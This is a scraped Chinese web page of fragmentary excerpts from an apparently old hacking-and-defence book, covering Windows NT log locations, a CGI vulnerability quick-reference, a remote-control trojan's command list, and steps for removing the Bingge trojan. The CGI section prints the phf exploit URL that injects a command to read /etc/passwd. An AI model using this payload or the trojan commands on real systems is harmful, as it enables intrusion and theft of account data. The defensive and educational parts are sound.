摘要:
4.3 关于网站安全日志
4.3 关于网站安全日志
通过日志记录追查入侵者来源是一种最有效的办法, windows nt的日志文件通常有应用程序日志、安全日志、系统日志、dns服务器日志、ftp日志、www日志等。接下来我们了解一下windows nt服务器上的日志,以下以windows 2000为例。
1.windows nt服务器日志默认存放路径
● www日志
www日志是......
摘要:
3.5 cgi及系统漏洞速查(1)
3.5 cgi及系统漏洞速查
● phf漏洞
漏洞介绍:phf漏洞是最经典了,可以通过浏览器执行服务器的命令来查找,如下 所示:
/etc/passwd
lynx http://server/cgi-bin/phf?qalias=x%0a/bin/cat%20/etc/passwd
● php.cgi 2.0beta10或更早版本的漏洞
......
黑客攻防技术内幕-入侵者攻击方法(4)
5.1 入侵者常用软件(4)
例如: 【程序编程相关:
几种分布式攻击的防范(2)】 【推荐阅读:
几种分布式攻击的防范(1)】
cmd type c:\test.txt 【扩展信息:
Win2000如何预防Ping攻击】
cmd dir
run [filename] 运行命令
例如:
run c:\test.wav
run c:\windows\system\msconfig.exe
run c:\screen.jpg
chat [messages you want to send] 打开聊天窗口与被控机聊天
例如:
chat 你好
chat # (这个表示关闭聊天窗口)
changetelnetport [port] 远程修改telnet端口
例如:changetelnetport 23,表示把telnet端口修改为 23,服务端重启(restart)后才能 生效....
下一页 摘要:
3.2 常见特洛伊木马的清除方法(2)
3.2.3 冰河清除方法
1. 自动卸载
1.2以后版本的“冰河”本身提供了自动卸载的功能,只需在客户端选择→【控制类命令】→【系统控制】→【自动卸载】命令即可自动卸载。只要先连接127.0.0.1,然后执行【自动卸载】命令就可以彻底卸载冰河。
2. 手动卸载
(1) 重新启动计算机,打开计算机后,按住键盘上的shift键,以安全模式......
